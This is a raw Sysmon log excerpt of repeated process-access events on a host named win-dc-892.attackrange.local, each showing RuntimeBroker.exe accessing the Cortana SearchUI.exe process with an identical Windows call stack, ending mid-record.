10341000x80000000000000007704Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007703Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007702Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007701Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007700Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007699Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007698Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007697Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007696Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007695Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007694Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007693Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007692Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007691Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007690Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007689Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007688Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007687Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007686Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007685Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 